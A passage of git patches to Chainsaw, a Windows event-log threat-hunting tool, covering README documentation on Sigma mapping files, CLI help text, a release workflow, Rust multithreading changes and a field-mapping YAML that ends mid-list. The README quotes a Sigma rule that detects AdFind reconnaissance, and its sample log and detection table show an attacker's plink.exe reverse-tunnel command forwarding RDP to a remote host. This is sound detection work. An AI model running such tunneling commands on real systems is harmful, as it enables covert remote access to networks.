Microsoft-Windows-Sysmon) - - What fields in those event logs to care process (e.g. Event.EventData.OriginalFileName) - - What fields to display in the table output when a rule matches - -Let's take a look at each of the sub-keys in turn: - -##### Event ID - -If we look at the example mapping file shown a few lines above, this snippet is telling Chainsaw to process all of the Windows Event Logs that have the ID of '1'. **When Chainsaw parses event logs in 'hunt' mode, if the event ID is not listed in the mapping file, it will be ignored.** This approach helps to drastically speed up the execution time of Chainsaw, because it means that we only perform rule matching on the event logs that we definitely care about. - -##### Provider - -Only specifying the event ID is not granular enough; random Windows applications can specify their own event ID so if we want to target just the process creation event logs for sysmon (which is what we're looking for with Event ID 1) then we need to be more specific about which event logs we're interested in. This is why we also need to specify the provider as well: - - provider: "Microsoft-Windows-Sysmon" - -So in this case, Chainsaw will only process Windows event log entries if the event ID is "1" AND the provider is "Microsoft-Windows-Sysmon". - -##### Title - -The *title* key specifies what text Chainsaw should put at the top of each section of output relating to detections for these event IDs. So in this example, all detections relating to EventID: 1 from the Sysmon provider will be titled "Suspicious Process Creation": - - [+] Detection: Suspicious Process Creation - ┌─────────────────────┬────┬──────────────────────────────────────────┬────────────────────────────────┬────────────────────────────────────────────────────┬────────────────────────────────────────────────────┐ - │ system_time │ id │ detection_rules │ computer_name │ Event.EventData.Image │ command_line │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-02-16 10:02:21 │ 1 │ ‣ Exfiltration and Tunneling │ "PC01.example.corp" │ C:\Users\IEUser\Desktop\plink.exe │ plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127 │ - │ │ │ Tools Execution │ │ │ .0.0.2:3389 -l test -pw test │ - -##### search_fields - -The search fields sub-key tells chainsaw which fields in the event log to process, and how they should be mapped to the Sigma rule format. Let's look at an example, let's say we want to run the following Sigma rule over all Process Creation events from Sysmon: - - title: Suspicious AdFind Execution - id: 75df3b17-8bcc-4565-b89b-c9898acef911 - status: experimental - description: Detects the execution of a AdFind for Active Directory enumeration - references: - - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx - - https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/Emulation_Plan/Phase1.md - - https://thedfirreport.com/2020/05/08/adfind-recon/ - author: FPT.EagleEye Team, omkar72, oscd.community - date: 2020/09/26 - modified: 2021/05/12 - tags: - - attack.discovery - - attack.t1018 - - attack.t1087.002 - - attack.t1482 - - attack.t1069.002 - logsource: - product: windows - category: process_creation - detection: - selection: - CommandLine|contains: - - 'objectcategory' - - 'trustdmp' - - 'dcmodes' - - 'dclist' - - 'computers_pwdnotreqd' - Image|endswith: '\adfind.exe' - condition: selection - falsepositives: - - Administrative activity - level: medium - -In the Sigma rule above, we can see that the detection criteria relies on two key fields: - - - CommandLine - - Image - -Without a mapping file, Chainsaw wouldn't know which fields in the event log (they're not always named the same) to apply this logic to. So we need to tell Chainsaw which event log fields are the CommandLine and the Image. Fortunately Chainsaw gives us a way to find out this information, let's look at an example event ID 1 log: - - > % ./chainsaw search -e 1 ~/chainsaw/evtx_attack_samples/ -q | head -n 50 - --- - Event: - EventData: - CommandLine: "plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test" <------ Command Line - Company: Simon Tatham - CurrentDirectory: "C:\\Users\\IEUser\\Desktop\\" - Description: "Command-line SSH, Telnet, and Rlogin client" - FileVersion: Release 0.70 - Hashes: SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4 - Image: "C:\\Users\\IEUser\\Desktop\\plink.exe" <----- Process Name - IntegrityLevel: High - LogonGuid: 365ABB72-D6AB-5C67-0000-002056660200 - LogonId: "0x26656" - ParentCommandLine: "\"C:\\Windows\\system32\\cmd.exe\" " - ParentImage: "C:\\Windows\\System32\\cmd.exe" - ParentProcessGuid: 365ABB72-D92A-5C67-0000-0010CB580900 - ParentProcessId: 3904 - ProcessGuid: 365ABB72-DFAD-5C67-0000-0010E0811500 - ProcessId: 2312 - Product: PuTTY suite - RuleName: "" - TerminalSessionId: 1 - User: "PC01\\IEUser" - UtcTime: "2019-02-16 10:02:21.934" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: PC01.example.corp - Correlation: ~ - EventID: 1 - EventRecordID: 1940899 - Execution_attributes: - ProcessID: 1728 - ThreadID: 412 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon <----- Provider - Security_attributes: - UserID: S-1-5-18 - Task: 1 - TimeCreated_attributes: - SystemTime: "2019-02-16T10:02:21.934438Z" - Version: 5 - Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - -Looking at the output of Chainsaw above, we can see that the fields that we need to map are: - - - CommandLine == Event.EventData.CommandLine - - Image == Event.EventData.Image - -By adding this information to the mapping file, Chainsaw can now run this sigma rule against the process creation event logs. - -##### table_headers - -The table_headers key in the mapping file tells Chainsaw which fields to output when displaying detections. Displaying all the fields in the event log would be difficult to format and would be difficult for analysts to view, so instead we specify the key fields that we care about. - -This section **must** contain at least one sub-key named: *context_field*. The field specified in this key will always be placed in the left most position on the table output. All other specified fields will be placed after that. Let's take a look at an example: - - table_headers: <------- Which fields to output in table/csv - context_field: "Event.EventData.Image" - command_line: "Event.EventData.CommandLine" - -This means that for every detection for Event ID: 1 (sysmon process creation) events, the **Event.EventData.Image** and **Event.EventData.CommandLine** fields from the matching event log will be shown in the output of Chainsaw: - - [+] Detection: Suspicious Process Creation - ┌─────────────────────┬────┬──────────────────────────────────────────┬────────────────────────────────┬────────────────────────────────────────────────────┬────────────────────────────────────────────────────┐ - │ system_time │ id │ detection_rules │ computer_name │ Event.EventData.Image │ command_line │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-02-16 10:02:21 │ 1 │ ‣ Exfiltration and Tunneling │ "PC01.example.corp" │ C:\Users\IEUser\Desktop\plink.exe │ plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127 │ - │ │ │ Tools Execution │ │ │ .0.0.2:3389 -l test -pw test │ - -(Note: the system_time, event ID, detection_rule and computer name will always be shown in addition to the fields specified in the table_headers section) + ./chainsaw hunt evtx_attack_samples/ -s sigma_rules --mapping mappings/sigma-event-logs.yml --from "2019-03-17T19:09:39" --to "2019-03-17T19:09:50" --json ### Acknowledgements - - [EVTX-ATTACK-SAMPLES](https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES) by [SBousseaden](https://twitter.com/SBousseaden) + - [EVTX-ATTACK-SAMPLES](https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES) by [@SBousseaden](https://twitter.com/SBousseaden) - [Sigma](https://github.com/SigmaHQ/sigma) detection rules - [EVTX parser](https://github.com/omerbenamram/evtx) library by [@OBenamram](https://twitter.com/obenamram?lang=en) - [TAU Engine](https://github.com/countercept/tau-engine) Library by [@AlexKornitzer](https://twitter.com/AlexKornitzer?lang=en) diff --git a/chainsaw.png b/images/chainsaw.png similarity index 100% rename from chainsaw.png rename to images/chainsaw.png diff --git a/src/main.rs b/src/main.rs index 0e4344f9..6990d7de 100644 --- a/src/main.rs +++ b/src/main.rs @@ -20,7 +20,21 @@ use chainsaw::{ #[derive(StructOpt)] #[structopt( name = "chainsaw", - about = "Rapidly Search and Hunt through windows event logs" + about = "Rapidly Search and Hunt through windows event logs", + after_help = r"Examples: + + Hunt with Sigma and Chainsaw Rules: + ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml -r rules/ + + Hunt with Sigma rules and output in JSON: + ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml --json + + Search for the case-insensitive word 'mimikatz': + ./chainsaw search mimikatz -i evtx_attack_samples/ + + Search for Powershell Script Block Events (EventID 4014): + ./chainsaw search -t 'Event.System.EventID: =4104' evtx_attack_samples/ + " )] struct Opts { /// Hide Chainsaw's banner. @@ -32,18 +46,18 @@ struct Opts { #[derive(StructOpt)] enum Command { - /// Hunt through event logs using detection rules and builtin logic. + /// Hunt through event logs using detection rules for threat detection Hunt { - /// The path to a collection of rules. + /// The path to a collection of rules to use for hunting. rules: PathBuf, - /// The paths containing event logs to hunt through. + /// The paths containing event logs to load and hunt through. path: Vec, - /// A mapping file to hunt with. + /// A mapping file to tell Chainsaw how to use third-party rules. #[structopt(short = "m", long = "mapping", number_of_values = 1)] mapping: Option>, - /// Additional rules to hunt with. + /// A path containing additional rules to hunt with. #[structopt(short = "r", long = "rule", number_of_values = 1)] rule: Option>, @@ -77,7 +91,7 @@ enum Command { /// Output the timestamp using the local machine's timestamp. #[structopt(long = "local", group = "tz")] local: bool, - /// Apply addional metadata for the tablar output. + /// Display additional metadata in the tablar output. #[structopt(long = "metadata", conflicts_with = "json")] metadata: bool, /// The file/directory to output to. @@ -89,7 +103,7 @@ enum Command { /// Supress informational output. #[structopt(short = "q")] quiet: bool, - /// Sigma rules to hunt with. + /// A path containing Sigma rules to hunt with. #[structopt(short = "s", long = "sigma", number_of_values = 1, requires("mapping"))] sigma: Option>, /// Continue to hunt when an error is encountered. @@ -124,10 +138,10 @@ enum Command { #[structopt(required_unless_one=&["regexp", "tau"])] pattern: Option, - /// The paths containing event logs to hunt through. + /// The paths containing event logs to load and hunt through. path: Vec, - /// A pattern to search for. + /// A regular expressions (RegEx) pattern to search for. #[structopt(short = "e", long = "regexp", number_of_values = 1)] regexp: Option>, From a6db8feccc9756a2768d0ca7a7a3c7101dfbd3a7 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Wed, 6 Jul 2022 23:12:34 +0100 Subject: [PATCH 59/77] docs: updating quick start guide --- README.md | 22 +++++++++++++++++----- 1 file changed, 17 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 342a5992..eadefddc 100644 --- a/README.md +++ b/README.md @@ -111,7 +111,7 @@ Windows event logs provide a rich source of forensic information for threat hunt At WithSecure Countercept, we ingest a wide range of telemetry sources from endpoints via our EDR agent to provide our managed detection and response service. However, there are circumstances where we need to quickly analyze event log data that hasn’t been captured by our EDR, a common example being incident response investigations on an estate where our EDR wasn’t installed at the time of the compromise. Chainsaw was created to provide our threat hunters and incident response consultants with a tool to perform rapid triage of Windows event logs in these circumstances. -At the time of writing, there are very few open-source, standalone tools that provide a simple and fast method of triaging Windows event logs, identifying interesting elements within the logs and applying a detection logic rule format (such as Sigma) to detect signs of malicious activity. In our testing, the tools that did exist struggled to efficiently apply detection logic to large volumes of event logs making them unsuitable for scenarios where quick triage is required. +At the time of writing, there are very few open-source, standalone tools that provide a simple and fast method of triaging Windows event logs, identifying interesting elements within the logs and applying a detection logic rule format (such as Sigma) to detect signs of malicious activity. In our testing, the tools that did exist struggled to efficiently apply detection logic to large volumes of event logs making them unsuitable for scenarios where quick triage is required. ## Hunting Logic @@ -142,14 +142,26 @@ In addition to supporting sigma rules, Chainsaw also supports a custom rule form ## Quick Start Guide ### Downloading and Running -You can find pre-compiled versions of chainsaw in the [releases section](https://github.com/countercept/chainsaw/releases) of this Github repo, or you can clone the repo (and the submodules) by running: - `git clone --recurse-submodules https://github.com/countercept/chainsaw.git` -You can then compile the code yourself by running: `cargo build --release`. Once the build has finished, you will find a copy of the compiled binary in the target/release folder. +With the release of Chainsaw v2, we decided to no longer include the Sigma Rules and EVTX-Attack-Samples repositories as Chainsaw submodules. We recommend that you clone these repositories separately to ensure you have the latest versions. + +If you still need an all-in-one package containing the Chainsaw binary, Sigma rules and example Event logs, you can download it from the [releases section](https://github.com/countercept/chainsaw/releases) section of this Github repo. In this releases section you will also find pre-compiled binary-only versions of Chainsaw for various platforms and architectures. + +If you want to compile Chainsaw yourself, you can clone the Chainsaw repo: + + `git clone https://github.com/countercept/chainsaw.git` + +and compile the code yourself by running: `cargo build --release`. Once the build has finished, you will find a copy of the compiled binary in the target/release folder. **Make sure to build with the `--release` flag as this will ensure significantly faster execution time.** -If you want to quickly see what Chainsaw looks like when it runs, you can use the command: +If you want to quickly see what Chainsaw looks like when it runs, you can clone the [Sigma Rules](https://github.com/SigmaHQ/sigma) and [EVTX-Attack-Samples](https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES) repositories: + +``` +git clone https://github.com/SigmaHQ/sigma +git clone https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES.git +``` +and then run Chainsaw with the parameters below: ``` ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml ``` From d24709be136a4d2be6de99ab23607663ec21ae9f Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 00:09:02 +0100 Subject: [PATCH 60/77] chore: updating v2 workflow to create unified zip --- .github/workflows/v2.yml | 98 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 98 insertions(+) diff --git a/.github/workflows/v2.yml b/.github/workflows/v2.yml index 35928658..2da6b3bd 100644 --- a/.github/workflows/v2.yml +++ b/.github/workflows/v2.yml @@ -28,6 +28,14 @@ jobs: - name: Build run: cargo build --all --release --target x86_64-unknown-linux-gnu && strip target/x86_64-unknown-linux-gnu/release/chainsaw + - name: Upload binary artifact + uses: actions/upload-artifact@v3 + with: + name: linux-binary + path: target/x86_64-unknown-linux-gnu/release/chainsaw + if-no-files-found: error + retention-days: 1 + - name: Move files to artifacts run: mv target/x86_64-unknown-linux-gnu/release/chainsaw mappings LICENCE README.md chainsaw/ @@ -65,6 +73,14 @@ jobs: - name: Build run: cargo build --all --release --target x86_64-unknown-linux-musl && strip target/x86_64-unknown-linux-musl/release/chainsaw + - name: Upload binary artifact + uses: actions/upload-artifact@v3 + with: + name: linux-static-binary + path: target/x86_64-unknown-linux-musl/release/chainsaw + if-no-files-found: error + retention-days: 1 + - name: Move files to artifacts run: mv target/x86_64-unknown-linux-musl/release/chainsaw mappings LICENCE README.md chainsaw/ @@ -98,6 +114,14 @@ jobs: - name: Build run: cargo build --all --release + - name: Upload binary artifact + uses: actions/upload-artifact@v3 + with: + name: win-binary + path: target/release/chainsaw.exe + if-no-files-found: error + retention-days: 1 + - name: Create artifacts directory run: mkdir chainsaw @@ -139,6 +163,14 @@ jobs: - name: Build for mac run: cargo build --all --release && strip target/release/chainsaw + - name: Upload binary artifact + uses: actions/upload-artifact@v3 + with: + name: mac-binary + path: target/release/chainsaw + if-no-files-found: error + retention-days: 1 + - name: Move files to artifacts run: mv target/release/chainsaw mappings LICENCE README.md chainsaw/ @@ -152,3 +184,69 @@ jobs: files: chainsaw_x86_64-apple-darwin.zip env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + build-complete: + needs: [build-linux, build-linux-static, build-win, build-mac] + runs-on: ubuntu-latest + + steps: + - name: Create artifacts directory + run: mkdir chainsaw + + - name: Checkout + uses: actions/checkout@v2 + with: + path: ./chainsaw-root + + - name: Checkout Sigma Repo + uses: actions/checkout@v3 + with: + repository: SigmaHQ/sigma + path: ./sigma + + - name: Checkout EVTX Samples Repo + uses: actions/checkout@v3 + with: + repository: sbousseaden/EVTX-ATTACK-SAMPLES + path: ./EVTX-ATTACK-SAMPLES + + - name: Move files to artifacts + run: mv sigma EVTX-ATTACK-SAMPLES chainsaw/ + + - name: Download build-linux binary + uses: actions/download-artifact@v3 + with: + name: linux-binary + path: ./chainsaw-linux + + - name: Download build-linux-static binary + uses: actions/download-artifact@v3 + with: + name: linux-static-binary + path: ./chainsaw-linux-static + + - name: Download build-win binary + uses: actions/download-artifact@v3 + with: + name: win-binary + path: ./chainsaw-win + + - name: Download build-mac binary + uses: actions/download-artifact@v3 + with: + name: mac-binary + path: ./chainsaw-mac + + - name: build zip file content + run: mv ./chainsaw-linux/chainsaw ./chainsaw/chainsaw_x86_64-unknown-linux-gnu; mv ./chainsaw-linux-static/chainsaw ./chainsaw/chainsaw_x86_64-unknown-linux-mus; mv ./chainsaw-win/chainsaw.exe ./chainsaw/chainsaw_x86_64-pc-windows-msvc.exe; mv ./chainsaw-mac/chainsaw ./chainsaw/chainsaw_x86_64-apple-darwin ; mv ./chainsaw-root/mappings ./chainsaw-root/LICENCE ./chainsaw-root/README.md ./chainsaw-root/rules/ ./chainsaw/ + + - name: Create ZIP File + run: tar -czf chainsaw_all_platforms+rules+examples.tar.gz chainsaw/* + + - name: Release + uses: softprops/action-gh-release@v1 + if: startsWith(github.ref, 'refs/tags/') + with: + files: chainsaw_all_platforms+rules+examples.tar.gz + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} From 272b7939a0b96223bebce6cbc8cd55771e83c3f5 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Thu, 7 Jul 2022 10:42:58 +0100 Subject: [PATCH 61/77] feat: enable multi threading for group hunts --- src/hunt.rs | 93 ++++++++++++++++++++++++++++++++--------------------- 1 file changed, 57 insertions(+), 36 deletions(-) diff --git a/src/hunt.rs b/src/hunt.rs index 90a573d8..d3a47d66 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -8,6 +8,7 @@ use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; use chrono_tz::Tz; // https://github.com/rust-lang/rust/issues/74465 use once_cell::unsync::OnceCell; +use rayon::prelude::*; use serde::{Deserialize, Serialize}; use serde_json::Value as Json; use tau_engine::{ @@ -454,45 +455,65 @@ impl Hunter { kind, } => { if tau_engine::core::solve(filter, &mapped) { - for (rid, rule) in &self.inner.rules { - if !rule.is_kind(kind) { - continue; - } - if exclusions.contains(rule.name()) { - continue; - } - let hit = rule.solve(&mapped); - if hit { - if let Some(aggregate) = &rule.aggregate() { - files.insert(document_id, (document.clone(), timestamp)); - let mut hasher = DefaultHasher::new(); - let mut skip = false; - for field in &aggregate.fields { - if let Some(value) = - mapped.find(field).and_then(|s| s.to_string()) - { - value.hash(&mut hasher); - } else { - skip = true; - break; - } + let matches = &self + .inner + .rules + .par_iter() + .filter_map(|(rid, rule)| { + // NOTE: Needed as Document is not Sync + let wrapper; + let mapped = match &document { + File::Evtx(evtx) => { + wrapper = crate::evtx::Wrapper(&evtx.data); + hunt.mapper.mapped(&wrapper) } - if skip { - continue; - } - let id = hasher.finish(); - let aggregates = aggregates - .entry((hunt.id, *rid)) - .or_insert((aggregate, HashMap::new())); - let docs = aggregates.1.entry(id).or_insert(vec![]); - docs.push(document_id); + File::Json(json) => hunt.mapper.mapped(json), + File::Xml(xml) => hunt.mapper.mapped(xml), + }; + + if !rule.is_kind(kind) { + return None; + } + if exclusions.contains(rule.name()) { + return None; + } + if rule.solve(&mapped) { + Some((*rid, rule)) } else { - hits.push(Hit { - hunt: hunt.id, - rule: *rid, - timestamp, - }); + None + } + }) + .collect::>(); + for (rid, rule) in matches { + if let Some(aggregate) = &rule.aggregate() { + files.insert(document_id, (document.clone(), timestamp)); + let mut hasher = DefaultHasher::new(); + let mut skip = false; + for field in &aggregate.fields { + if let Some(value) = + mapped.find(field).and_then(|s| s.to_string()) + { + value.hash(&mut hasher); + } else { + skip = true; + break; + } + } + if skip { + continue; } + let id = hasher.finish(); + let aggregates = aggregates + .entry((hunt.id, *rid)) + .or_insert((aggregate, HashMap::new())); + let docs = aggregates.1.entry(id).or_insert(vec![]); + docs.push(document_id); + } else { + hits.push(Hit { + hunt: hunt.id, + rule: *rid, + timestamp, + }); } } } From aa098ce853748c0dfd6f6a3c6a914e047bc51062 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Thu, 7 Jul 2022 13:12:52 +0100 Subject: [PATCH 62/77] chore: add warning message on high rule fail count --- src/main.rs | 3 +++ 1 file changed, 3 insertions(+) diff --git a/src/main.rs b/src/main.rs index 6990d7de..6c093b44 100644 --- a/src/main.rs +++ b/src/main.rs @@ -342,6 +342,9 @@ fn run() -> Result<()> { } } } + if failed > 500 && sigma.is_empty() { + cs_eyellowln!("[!] {} rules failed to load, ensure Sigma rule paths are specified with the '-s' flag", failed); + } if count == 0 { return Err(anyhow::anyhow!( "No valid detection rules were found in the provided paths", From 90579ef08538ba6445c235cb6449078f708dda83 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Thu, 7 Jul 2022 13:17:59 +0100 Subject: [PATCH 63/77] feat: add a global sigma mapping --- mappings/sigma-event-logs-all.yml | 497 ++++++++++++++++++++++++++++++ 1 file changed, 497 insertions(+) create mode 100644 mappings/sigma-event-logs-all.yml diff --git a/mappings/sigma-event-logs-all.yml b/mappings/sigma-event-logs-all.yml new file mode 100644 index 00000000..2311274a --- /dev/null +++ b/mappings/sigma-event-logs-all.yml @@ -0,0 +1,497 @@ +--- +name: Chainsaw's groupless Sigma mappings for Event Logs +kind: evtx +rules: sigma + +groups: + - name: Sigma + timestamp: Event.System.TimeCreated + filter: + Provider: "*" + fields: + - from: Provider + to: Event.System.Provider + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Record ID + from: EventRecordID + to: Event.System.EventRecordID + - name: Computer + from: Computer + to: Event.System.Computer + + - from: AccessList + to: Event.EventData.AccessList + visible: false + - from: AccessMask + to: Event.EventData.AccessMask + visible: false + - from: Accesses + to: Event.EventData.Accesses + visible: false + - from: AccountName + to: Event.EventData.AccountName + visible: false + - from: Action + to: Event.EventData.Action + visible: false + - from: Address + to: Event.EventData.Address + visible: false + - from: AllowedToDelegateTo + to: Event.EventData.AllowedToDelegateTo + visible: false + - from: Application + to: Event.EventData.Application + visible: false + - from: ApplicationPath + to: Event.EventData.ApplicationPath + visible: false + - from: AttributeLDAPDisplayName + to: Event.EventData.AttributeLDAPDisplayName + visible: false + - from: AttributeValue + to: Event.EventData.AttributeValue + visible: false + - from: AuditPolicyChanges + to: Event.EventData.AuditPolicyChanges + visible: false + - from: AuditSourceName + to: Event.EventData.AuditSourceName + visible: false + - from: AuthenticationPackageName + to: Event.EventData.AuthenticationPackageName + visible: false + - from: CallTrace + to: Event.EventData.CallTrace + visible: false + - from: CallerProcessName + to: Event.EventData.CallerProcessName + visible: false + - from: Caption + to: Event.EventData.Caption + visible: false + - from: CertThumbprint + to: Event.EventData.CertThumbprint + visible: false + - from: Channel + to: Event.EventData.Channel + visible: false + - from: ClassName + to: Event.EventData.ClassName + visible: false + - from: CommandLine + to: Event.EventData.CommandLine + visible: false + - from: Commandline + to: Event.EventData.Commandline + visible: false + - from: Company + to: Event.EventData.Company + visible: false + - from: ContextInfo + to: Event.EventData.ContextInfo + visible: false + - from: CurrentDirectory + to: Event.EventData.CurrentDirectory + visible: false + - from: Description + to: Event.EventData.Description + visible: false + - from: DestAddress + to: Event.EventData.DestAddress + visible: false + - from: DestPort + to: Event.EventData.DestPort + visible: false + - from: Destination + to: Event.EventData.Destination + visible: false + - from: DestinationHostname + to: Event.EventData.DestinationHostname + visible: false + - from: DestinationIp + to: Event.EventData.DestinationIp + visible: false + - from: DestinationIsIpv6 + to: Event.EventData.DestinationIsIpv6 + visible: false + - from: DestinationPort + to: Event.EventData.DestinationPort + visible: false + - from: Details + to: Event.EventData.Details + visible: false + - from: Device + to: Event.EventData.Device + visible: false + - from: DeviceDescription + to: Event.EventData.DeviceDescription + visible: false + - from: DeviceName + to: Event.EventData.DeviceName + visible: false + - from: EngineVersion + to: Event.EventData.EngineVersion + visible: false + - from: ErrorCode + to: Event.EventData.ErrorCode + visible: false + - from: EventType + to: Event.EventData.EventType + visible: false + - from: FailureCode + to: Event.EventData.FailureCode + visible: false + - from: FileName + to: Event.EventData.FileName + visible: false + - from: FileVersion + to: Event.EventData.FileVersion + visible: false + - from: GrantedAccess + to: Event.EventData.GrantedAccess + visible: false + - from: Hashes + to: Event.EventData.Hashes + visible: false + - from: HiveName + to: Event.EventData.HiveName + visible: false + - from: HostApplication + to: Event.EventData.HostApplication + visible: false + - from: HostName + to: Event.EventData.HostName + visible: false + - from: HostVersion + to: Event.EventData.HostVersion + visible: false + - from: Image + to: Event.EventData.Image + visible: false + - from: ImageFileName + to: Event.EventData.ImageFileName + visible: false + - from: ImageLoaded + to: Event.EventData.ImageLoaded + visible: false + - from: ImagePath + to: Event.EventData.ImagePath + visible: false + - from: Imphash + to: Event.EventData.Imphash + visible: false + - from: Initiated + to: Event.EventData.Initiated + visible: false + - from: IntegrityLevel + to: Event.EventData.IntegrityLevel + visible: false + - from: IpAddress + to: Event.EventData.IpAddress + visible: false + - from: KeyLength + to: Event.EventData.KeyLength + visible: false + - from: Keywords + to: Event.EventData.Keywords + visible: false + - from: LayerRTID + to: Event.EventData.LayerRTID + visible: false + - from: Level + to: Event.EventData.Level + visible: false + - from: LocalName + to: Event.EventData.LocalName + visible: false + - from: LogonId + to: Event.EventData.LogonId + visible: false + - from: LogonProcessName + to: Event.EventData.LogonProcessName + visible: false + - from: LogonType + to: Event.EventData.LogonType + visible: false + - from: Message + to: Event.EventData.Message + visible: false + - from: ModifyingApplication + to: Event.EventData.ModifyingApplication + visible: false + - from: NewName + to: Event.EventData.NewName + visible: false + - from: NewTargetUserName + to: Event.EventData.NewTargetUserName + visible: false + - from: NewTemplateContent + to: Event.EventData.NewTemplateContent + visible: false + - from: NewUacValue + to: Event.EventData.NewUacValue + visible: false + - from: NewValue + to: Event.EventData.NewValue + visible: false + - from: ObjectClass + to: Event.EventData.ObjectClass + visible: false + - from: ObjectName + to: Event.EventData.ObjectName + visible: false + - from: ObjectServer + to: Event.EventData.ObjectServer + visible: false + - from: ObjectType + to: Event.EventData.ObjectType + visible: false + - from: ObjectValueName + to: Event.EventData.ObjectValueName + visible: false + - from: OldTargetUserName + to: Event.EventData.OldTargetUserName + visible: false + - from: OldUacValue + to: Event.EventData.OldUacValue + visible: false + - from: Origin + to: Event.EventData.Origin + visible: false + - from: OriginalFileName + to: Event.EventData.OriginalFileName + visible: false + - from: OriginalFilename + to: Event.EventData.OriginalFilename + visible: false + - from: OriginalName + to: Event.EventData.OriginalName + visible: false + - from: ParentCommandLine + to: Event.EventData.ParentCommandLine + visible: false + - from: ParentImage + to: Event.EventData.ParentImage + visible: false + - from: ParentUser + to: Event.EventData.ParentUser + visible: false + - from: PasswordLastSet + to: Event.EventData.PasswordLastSet + visible: false + - from: Path + to: Event.EventData.Path + visible: false + - from: Payload + to: Event.EventData.Payload + visible: false + - from: PipeName + to: Event.EventData.PipeName + visible: false + - from: PossibleCause + to: Event.EventData.PossibleCause + visible: false + - from: PrivilegeList + to: Event.EventData.PrivilegeList + visible: false + - from: ProcessId + to: Event.EventData.ProcessId + visible: false + - from: ProcessName + to: Event.EventData.ProcessName + visible: false + - from: Product + to: Event.EventData.Product + visible: false + - from: Properties + to: Event.EventData.Properties + visible: false + - from: ProviderName + to: Event.EventData.ProviderName + visible: false + - from: Provider_Name + to: Event.EventData.Provider_Name + visible: false + - from: QNAME + to: Event.EventData.QNAME + visible: false + - from: Query + to: Event.EventData.Query + visible: false + - from: QueryName + to: Event.EventData.QueryName + visible: false + - from: QueryResults + to: Event.EventData.QueryResults + visible: false + - from: QueryStatus + to: Event.EventData.QueryStatus + visible: false + - from: RelativeTargetName + to: Event.EventData.RelativeTargetName + visible: false + - from: RemoteAddress + to: Event.EventData.RemoteAddress + visible: false + - from: RemoteName + to: Event.EventData.RemoteName + visible: false + - from: SamAccountName + to: Event.EventData.SamAccountName + visible: false + - from: ScriptBlockText + to: Event.EventData.ScriptBlockText + visible: false + - from: SearchFilter + to: Event.EventData.SearchFilter + visible: false + - from: ServerName + to: Event.EventData.ServerName + visible: false + - from: Service + to: Event.EventData.Service + visible: false + - from: ServiceFileName + to: Event.EventData.ServiceFileName + visible: false + - from: ServiceName + to: Event.EventData.ServiceName + visible: false + - from: ServicePrincipalNames + to: Event.EventData.ServicePrincipalNames + visible: false + - from: ServiceStartType + to: Event.EventData.ServiceStartType + visible: false + - from: ServiceType + to: Event.EventData.ServiceType + visible: false + - from: ShareName + to: Event.EventData.ShareName + visible: false + - from: SidHistory + to: Event.EventData.SidHistory + visible: false + - from: Signed + to: Event.EventData.Signed + visible: false + - from: SourceAddress + to: Event.EventData.SourceAddress + visible: false + - from: SourceImage + to: Event.EventData.SourceImage + visible: false + - from: SourceIp + to: Event.EventData.SourceIp + visible: false + - from: SourcePort + to: Event.EventData.SourcePort + visible: false + - from: Source_Name + to: Event.EventData.Source_Name + visible: false + - from: StartAddress + to: Event.EventData.StartAddress + visible: false + - from: StartFunction + to: Event.EventData.StartFunction + visible: false + - from: StartModule + to: Event.EventData.StartModule + visible: false + - from: State + to: Event.EventData.State + visible: false + - from: Status + to: Event.EventData.Status + visible: false + - from: SubjectDomainName + to: Event.EventData.SubjectDomainName + visible: false + - from: SubjectLogonId + to: Event.EventData.SubjectLogonId + visible: false + - from: SubjectUserName + to: Event.EventData.SubjectUserName + visible: false + - from: SubjectUserSid + to: Event.EventData.SubjectUserSid + visible: false + - from: TargetFilename + to: Event.EventData.TargetFilename + visible: false + - from: TargetImage + to: Event.EventData.TargetImage + visible: false + - from: TargetLogonId + to: Event.EventData.TargetLogonId + visible: false + - from: TargetName + to: Event.EventData.TargetName + visible: false + - from: TargetObject + to: Event.EventData.TargetObject + visible: false + - from: TargetParentProcessId + to: Event.EventData.TargetParentProcessId + visible: false + - from: TargetPort + to: Event.EventData.TargetPort + visible: false + - from: TargetServerName + to: Event.EventData.TargetServerName + visible: false + - from: TargetSid + to: Event.EventData.TargetSid + visible: false + - from: TargetUserName + to: Event.EventData.TargetUserName + visible: false + - from: TargetUserSid + to: Event.EventData.TargetUserSid + visible: false + - from: TaskName + to: Event.EventData.TaskName + visible: false + - from: TemplateContent + to: Event.EventData.TemplateContent + visible: false + - from: TicketEncryptionType + to: 